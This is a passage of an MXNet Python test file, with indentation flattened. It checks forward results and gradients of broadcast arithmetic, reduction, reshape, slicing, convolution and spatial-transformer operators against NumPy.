test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
def test_reshape():
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
# Test new api (Using shape)
test_cases = [
[(2, 3, 5, 5), (0, -1), False, (2, 75)],
[(2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)],
[(5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)],
[(2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)],
[(2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)],
[(2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)],
[(2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)],
[(2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)],
[(2, 3, 5, 6), (-3, -3), False, (6, 30)],
[(2, 3, 5, 6), (-3, -1), False, (6, 30)],
[(64,), (-4, 16, 4), False, (16, 4)],
[(64,), (-4, 16, -1), False, (16, 4)],
[(64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)],
[(2, 3, 5, 5), (0, -1), True, (5, 30)],
[(2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)],
[(5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)],
[(2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)],
[(2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)],
[(2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)],
[(2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)],
[(2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)],
[(2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)],
[(2, 3, 5, 6), (-3, -3), True, (6, 30)],
[(64,), (16, 4, -4), True, (16, 4)],
[(64,), (16, -1, -4), True, (16, 4)],
[(1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16)]]
for test_case in test_cases:
test_reshape_new(*test_case)
# Test old api
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0].asnumpy(), groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd.asnumpy(), grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
